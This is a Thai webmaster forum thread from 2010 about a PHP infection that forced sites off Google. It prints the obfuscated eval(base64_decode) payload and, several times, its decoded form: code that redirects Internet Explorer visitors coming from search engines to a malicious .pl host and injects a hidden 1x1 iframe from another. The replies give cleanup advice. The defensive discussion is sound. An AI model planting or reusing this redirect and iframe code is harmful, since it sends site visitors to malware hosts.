ThaiSEOBoard.com

ความรู้ทั่วไป => Gooooooooooooogle => ข้อความที่เริ่มโดย: itmicrobit ที่ 03 พฤศจิกายน 2010, 02:38:59


หัวข้อ: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: itmicrobit ที่ 03 พฤศจิกายน 2010, 02:38:59
โค๊ด:
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHRydW09aGVhZGVyc19zZW50KCk7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKHN0cmlzdHIoJHVhLCJtc2llIikpew0KaWYgKCEkdHJ1bSl7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2FsYXBvdHJlbW5iYS5vc2EucGwvcmlmLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCn1lbHNlIHsNCmVjaG8gIjxpZnJhbWUgc3JjPSdodHRwOi8vcnRqaHRleWp0eWp0eWoub3JnZS5wbC9tZG0vJyBmcmFtZWJvcmRlcj0wIGhlaWdodD0xIHdpZHRoPTEgc2Nyb2xsaW5nPW5vPjwvaWZyYW1lPiI7DQp9DQoJfQ=="));

แบบเนี้ย ครายโดน
เวลา seach google ก็โดนแบน เลย


ไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ


หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: navico ที่ 03 พฤศจิกายน 2010, 02:50:51
ยังโดนกันเรื่อยๆใช่ไหมนี่...

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: mahaboyd ที่ 03 พฤศจิกายน 2010, 02:53:17
โค๊ด:
error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
	if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://alapotremnba.osa.pl/rif/");
		exit();
	}
	}
}else {
echo "<iframe src='http://rtjhteyjtyjtyj.orge.pl/mdm/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
	}

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: itmicrobit ที่ 03 พฤศจิกายน 2010, 02:58:58
รึว่า มันเป็นช่องโหว่ ทาง Php เลย อะ เฮ้อ
หรือช่องโหว่ทาง Wordpress
หรือช่องโหว่ ทาง MySql
หรือช่องโหว่ ทาง permission
หรือ server โดน Hack
หรือ อาไร
= ='

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: sugar ที่ 03 พฤศจิกายน 2010, 05:38:01
 :wanwan035: สงสัยโดนเต็มๆๆ ไม่น่าละเว็บหายไปเลย ถามหน่อยครับในไฟล configuration.php ของ joomla มานมี base64_decode หรือปล่าว

 :wanwan035: ทำไม่เรามีหว่า  :P

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: itmicrobit ที่ 03 พฤศจิกายน 2010, 06:20:26
ตกลง มัน คี๊อ   :(

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: หนุกหนาน ที่ 03 พฤศจิกายน 2010, 06:33:24
อ้างจาก: mahaboyd ที่ 03 พฤศจิกายน 2010, 02:53:17
โค๊ด:
error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
	if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: [url]http://alapotremnba.osa.pl/rif/[/url]");
		exit();
	}
	}
}else {
echo "<iframe src='[url]http://rtjhteyjtyjtyj.orge.pl/mdm/'[/url] frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
	}

อันนี้ถอดมาหรือครับ

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: itmicrobit ที่ 03 พฤศจิกายน 2010, 06:37:35

อ้างจาก: mahaboyd ที่ 03 พฤศจิกายน 2010, 02:53:17
โค๊ด:
error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
	if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: [url]http://alapotremnba.osa.pl/rif/[/url]");
		exit();
	}
	}
}else {
echo "<iframe src='[url]http://rtjhteyjtyjtyj.orge.pl/mdm/'[/url] frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
	}



อันนี้ รู้แล้ว แต่ วิธีการแก้ ปัญหา คื๊อ.........

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: foxrank ที่ 03 พฤศจิกายน 2010, 07:10:46
eval(base64_decode)  เป็นการเข้ารหัสของ PHP ซึ่ง code ภายในจะถูกซ่อนไว้ และจะถูกเรียกจาก remote server
ซึ่ง Server ปลายทางสามารถส่ง virus, cookie stuff หรือ auto run ต่าง ๆ ลงในเครื่องของ visitor เรา

ส่วนใหญ่เราจะเจอ eval(base64_decode) นี้จากพวก wordpress theme, joomla them ที่เอามาแชร์กัน (ของฟรีไม่มีในโลกครับ)
แต่ถ้าหากใครยังชอบของฟรีอยู่ แนะนำง่าย ๆ ครับ

พอ download  theme มา ให้เช็คทุก file ว่ามี code นี้ติดมาหรือเปล่า ถ้ามีติดมาให้ลบทั้ง code แล้ว run บน localhost ดูว่าใช้ได้ไหม
ถ้า theme ยังสามารถใช้งานได้ตามปกติ ก็โอเค แต่ถ้าหากใช้งานไม่ได้ก็เสียใจครับ

หากใครใช้ dream weaver ก็ ใช้  CTRL + F , ใส่ “eval(base64_decode” แล้ว run ครับเพื่อเช็ค
อีกอย่างหนึ่งหากได้ theme ที่ฟรีมา นอกจาก run eval(base64_decode เข็คแล้วให้ เช็คดูด้วยว่า มี Iframe ด้วยไหม
หากมี ก็ดูว่า iframe จาก web ไหนหากไม่แน่ใจให้ลบทิ้งครับ

เกือบลืม FTP ที่ใช้แนะนำให้ใช้ FileZilla เพราะหากใช้ตัว FTP ต่าง ๆ ที่ crack มาใช้ในการ FTP คุณกำลังเปิดประตู hosting ให้กับผู้อื่นสามารถเข้ามาให้ครับ

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: หนุกหนาน ที่ 03 พฤศจิกายน 2010, 08:26:25
อ้างจาก: itmicrobit ที่ 03 พฤศจิกายน 2010, 06:37:35

อ้างจาก: mahaboyd ที่ 03 พฤศจิกายน 2010, 02:53:17
โค๊ด:
error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
if (!$trum){
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
	if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: [url]http://alapotremnba.osa.pl/rif/[/url]");
		exit();
	}
	}
}else {
echo "<iframe src='[url]http://rtjhteyjtyjtyj.orge.pl/mdm/'[/url] frameborder=0 height=1 width=1 scrolling=no></iframe>";
}
	}



อันนี้ รู้แล้ว แต่ วิธีการแก้ ปัญหา คื๊อ.........



วิธีแก้หรือครับ
ก็ในเมื่อถอดออกมาได้โค้ดตามที่ว่ามา ก็ลบ พวกโค้ดเข้ารหัสเหล่านั้นออก แล้วเอาโค้ดที่ถอกออกมานี้ไปใส่แทน
โดยดัดแปลงบางส่วน เช่น เอา echo iframe ออก

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: bird35793 ที่ 03 พฤศจิกายน 2010, 09:30:35
ผมก็เคยโดนนะครับ วิธีแก้ที่แท้จริงผมยังไม่ได้ลองนะครับ
แต่ตอนที่ผมแก้ก็ใช้ text editor ตัวไหนก็ได้ครับเข้าไปค้นหาแล้วก็ลบออก
ส่วนใหญ่โค๊ดนี้จะอยู่ล่าง ๆๆๆ ของ หน้านั้นคับ

แต่เท่าที่ผมลองดูนะครับ เหมือนตอนนั้นผมจะ search ใน dream แล้วไม่เจออะครับ
ถ้าไม่ไงก็ลองเปิดจาก text editor ตัวอื่นอย่างพวก editplus ก็ได้นะครับ

ส่วนเรื่อง ftp แนะนำตัว filezilla อีกคนนะครับ
ตอนนั้นที่ใช้ cute ftp อยู่ รู้สึก โปรแกรม anti ไวรัสผมจะมองเป็นไวรัสนะครับ

หวังว่าจะมีคนหาวิธีแก้ที่ดีกว่านี้นะครับ ๆๆๆๆ :P

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: batdboyz ที่ 03 พฤศจิกายน 2010, 09:33:16
ทำไมไอ่ไฟล์เข้ารหัสแบบนี้ บางทีผมลบแล้วก็ลบไม่ออกนะครับ

อย่างเช่น WP ธีม บางธีม ที่ฟุตเตอร์น่ะ อยากลบก็ลบไม่ได้ ลบแล้วมันก็ยังอยู่ ผมมั่นใจว่ามันเป็นโค้ดตัวนี้แน่ๆ ก็เลยงงๆ

ไม่รู้ติด Cache รึเปล่าที่ยังมองเห็นมันอยู่ - -'

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: nutt49 ที่ 03 พฤศจิกายน 2010, 09:53:04
ผมโดนมาแล้ว 2 ครั้ง ลบกันหน้ามึดเลย ดีนะที่เครื่องแรง

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: pjgunner ที่ 03 พฤศจิกายน 2010, 10:31:30
ปรกติ เราไม่ค่อยใช้ eval กันเท่าไหร่

ใช้ dream search entire local site ด้วย "eval("

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: samabois ที่ 03 พฤศจิกายน 2010, 12:05:43
อ้างจาก: foxrank ที่ 03 พฤศจิกายน 2010, 07:10:46
eval(base64_decode)  เป็นการเข้ารหัสของ PHP ซึ่ง code ภายในจะถูกซ่อนไว้ และจะถูกเรียกจาก remote server
ซึ่ง Server ปลายทางสามารถส่ง virus, cookie stuff หรือ auto run ต่าง ๆ ลงในเครื่องของ visitor เรา

ส่วนใหญ่เราจะเจอ eval(base64_decode) นี้จากพวก wordpress theme, joomla them ที่เอามาแชร์กัน (ของฟรีไม่มีในโลกครับ)
แต่ถ้าหากใครยังชอบของฟรีอยู่ แนะนำง่าย ๆ ครับ

พอ download  theme มา ให้เช็คทุก file ว่ามี code นี้ติดมาหรือเปล่า ถ้ามีติดมาให้ลบทั้ง code แล้ว run บน localhost ดูว่าใช้ได้ไหม
ถ้า theme ยังสามารถใช้งานได้ตามปกติ ก็โอเค แต่ถ้าหากใช้งานไม่ได้ก็เสียใจครับ

หากใครใช้ dream weaver ก็ ใช้  CTRL + F , ใส่ “eval(base64_decode” แล้ว run ครับเพื่อเช็ค
อีกอย่างหนึ่งหากได้ theme ที่ฟรีมา นอกจาก run eval(base64_decode เข็คแล้วให้ เช็คดูด้วยว่า มี Iframe ด้วยไหม
หากมี ก็ดูว่า iframe จาก web ไหนหากไม่แน่ใจให้ลบทิ้งครับ

เกือบลืม FTP ที่ใช้แนะนำให้ใช้ FileZilla เพราะหากใช้ตัว FTP ต่าง ๆ ที่ crack มาใช้ในการ FTP คุณกำลังเปิดประตู hosting ให้กับผู้อื่นสามารถเข้ามาให้ครับ


อีกตัวที่แนะนำว่าดีกว่าไฟล์ซิลล่าก็

WinSCP ครับ ฟรีแวร์ แต่เร็วได้ใจ

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: KidTorB ที่ 03 พฤศจิกายน 2010, 12:10:14
อัพผ่าน host สบายใจสุดแล้วครับ  :wanwan035:

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: Hikkie ที่ 03 พฤศจิกายน 2010, 13:01:04
FileZilla ระวังนะครับ เก็บรหัสผ่านที่อยู่โฮส เป็น text file บนเครื่องที่ติดตั้งครับ

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: bird35793 ที่ 03 พฤศจิกายน 2010, 14:06:56
อ้างจาก: batdboyz ที่ 03 พฤศจิกายน 2010, 09:33:16
ทำไมไอ่ไฟล์เข้ารหัสแบบนี้ บางทีผมลบแล้วก็ลบไม่ออกนะครับ

อย่างเช่น WP ธีม บางธีม ที่ฟุตเตอร์น่ะ อยากลบก็ลบไม่ได้ ลบแล้วมันก็ยังอยู่ ผมมั่นใจว่ามันเป็นโค้ดตัวนี้แน่ๆ ก็เลยงงๆ

ไม่รู้ติด Cache รึเปล่าที่ยังมองเห็นมันอยู่ - -'

ที่ลบไม่ได้นี้คือยังไงอะครับ ต้องถามก่อนว่าแก้ผ่าน wp โดยตรงหรือเปล่าอะครับ
หรือว่าแก้ผ่าน text editor แล้วค่อยอัพขึ้นไปอะคับ
อย่าที่ได้แนะนำไว้คับ ถ้าแก้ผ่าน text editor รู้สึกว่าใน dream ผมจะลบไม่ได้นะครับ
ผมเลยใช่ตัวอื่นลบอะครับ ลองดูแล้วกันนะครับว่าได้หรือเปล่า :P

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: puma1420 ที่ 03 พฤศจิกายน 2010, 14:08:24
 :wanwan008:

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: batdboyz ที่ 03 พฤศจิกายน 2010, 14:11:24
อ้างจาก: bird35793 ที่ 03 พฤศจิกายน 2010, 14:06:56
อ้างจาก: batdboyz ที่ 03 พฤศจิกายน 2010, 09:33:16
ทำไมไอ่ไฟล์เข้ารหัสแบบนี้ บางทีผมลบแล้วก็ลบไม่ออกนะครับ

อย่างเช่น WP ธีม บางธีม ที่ฟุตเตอร์น่ะ อยากลบก็ลบไม่ได้ ลบแล้วมันก็ยังอยู่ ผมมั่นใจว่ามันเป็นโค้ดตัวนี้แน่ๆ ก็เลยงงๆ

ไม่รู้ติด Cache รึเปล่าที่ยังมองเห็นมันอยู่ - -'

ที่ลบไม่ได้นี้คือยังไงอะครับ ต้องถามก่อนว่าแก้ผ่าน wp โดยตรงหรือเปล่าอะครับ
หรือว่าแก้ผ่าน text editor แล้วค่อยอัพขึ้นไปอะคับ
อย่าที่ได้แนะนำไว้คับ ถ้าแก้ผ่าน text editor รู้สึกว่าใน dream ผมจะลบไม่ได้นะครับ
ผมเลยใช่ตัวอื่นลบอะครับ ลองดูแล้วกันนะครับว่าได้หรือเปล่า :P

ขอบคุณคับ เดี๋ยวไว้ไปลอง ผมลบผ่าน text editor นี่แหละ

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: itmicrobit ที่ 05 พฤศจิกายน 2010, 16:54:12
= =' ลบโค๊ด แล้ว ก็ ยัง มาอีก โทรจัน ไร หว่า

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: avalance ที่ 05 พฤศจิกายน 2010, 22:56:16
แก้ให้ลูกค้าหลายรายเลยครับเคสแบบนี้ แต่ก็ต้องทำต่อไป อิอิ  :P

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: darksammer ที่ 05 พฤศจิกายน 2010, 23:00:06
อ้างจาก: batdboyz ที่ 03 พฤศจิกายน 2010, 09:33:16
ทำไมไอ่ไฟล์เข้ารหัสแบบนี้ บางทีผมลบแล้วก็ลบไม่ออกนะครับ

อย่างเช่น WP ธีม บางธีม ที่ฟุตเตอร์น่ะ อยากลบก็ลบไม่ได้ ลบแล้วมันก็ยังอยู่ ผมมั่นใจว่ามันเป็นโค้ดตัวนี้แน่ๆ ก็เลยงงๆ

ไม่รู้ติด Cache รึเปล่าที่ยังมองเห็นมันอยู่ - -'

เป็นแบบเดียวกันเลย Footer ของธีม Genium อะ
ใครรู้วิธีถอดรหัสมันออก PM บอกหน่อยครับ เสียวๆอยู่

ไม่อยากเปลี่ยนธีมอะ เพราะมันเป็นธีมที่ผมโมได้ลงตัวที่สุดตั้งแต่ทำเว็บมา

หัวข้อ: Re: ไวรัสเขียน php เข้ารัหส eval(base64_decode("ZXJyb3JfcmVwb3J0aW5
เริ่มหัวข้อโดย: mama2008 ที่ 05 พฤศจิกายน 2010, 23:20:26
เคยโดนเหมือนกันครับ ถ้าเป็น WP มันจะอยู่ใน ธีม ต้องลบออกให้หมด แล้วเปลี่ยน USER&PASS ทันที ไม่งั้นมันก็จะเพิ่มต่อ ตอนแรกเปลี่ยน CHMOD เป็น 555 มันหายพอซักพักเหมือนมันรู้ มันมาเปลี่ยน CHMOD เป็น 777 และก็แทรกสคลิปไปอีก คราวนี้เป็น USER,PASS FTP มันหายไปเลยครับไม่มาอีกและไม่ต้องมาด้วย กลัว :wanwan009: :wanwan009:
ผมเดาว่ามันมากับโปรแกรมFTP นี่แหละครับ แต่ผมก็ใช้ Filezila นะไม่น่าจะโดนแต่ก็โดน แต่ปัจจุบันก็ยังใช้ Filezila อยู่นะแต่คอยอัพเดทมันตามที่มีให้อัพครับ


SMF 1.1.21 | Simple Machines | ThaiSEOBoard.com